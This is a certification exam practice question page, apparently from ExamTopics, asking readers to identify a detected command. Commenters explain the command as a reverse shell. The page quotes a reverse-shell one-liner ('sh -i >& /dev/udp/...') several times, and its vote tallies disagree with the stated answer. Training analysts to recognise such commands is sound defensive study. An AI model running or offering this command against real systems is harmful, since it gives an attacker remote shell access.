Get Unlimited Contributor Access to the all ExamTopics Exams!
Take advantage of PDF Files for 1000+ Exams along with community discussions and pass IT Certification Exams Easily.
A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l Which of the following is being attempted?
The command sh -i >& /dev/udp/10.1.1.1/4821 0>$l is indicative of an attempt to establish a reverse shell. Therefore, the correct answer is:
B. Reverse shell
The command sh -i >& /dev/udp/10.1.1.1/4821 0>$l is attempting to establish a reverse shell. In this command:
sh -i: Launches the Bourne shell (sh) in interactive mode (-i), allowing for interactive command execution.
>&: Redirects both standard output and standard error.
/dev/udp/10.1.1.1/4821: Specifies the destination for the redirected output, in this case, an IP address (10.1.1.1) and port (4821) using UDP.
0>$l: Redirects file descriptor 0 (standard input) to an undefined variable $l.
This command is attempting to establish a shell connection back to the specified IP address and port, effectively allowing the attacker to gain remote access to the system.
Correct
This command is a shell script that creates a reverse shell connection from the target system to the remote user’s system at IP address 10.1.1.1 and port 4821 using UDP protocol.
upvoted 4 times
...
Log in to ExamTopics
Sign in:
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.
Upvoting a comment with a selected answer will also increase the vote count towards that answer by one.
So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.
nmap_king_22
Highly Voted 8 months, 1 week agoglenndexter
Most Recent 1 week, 5 days agoAlizade
5 months, 3 weeks agokmordalv
8 months ago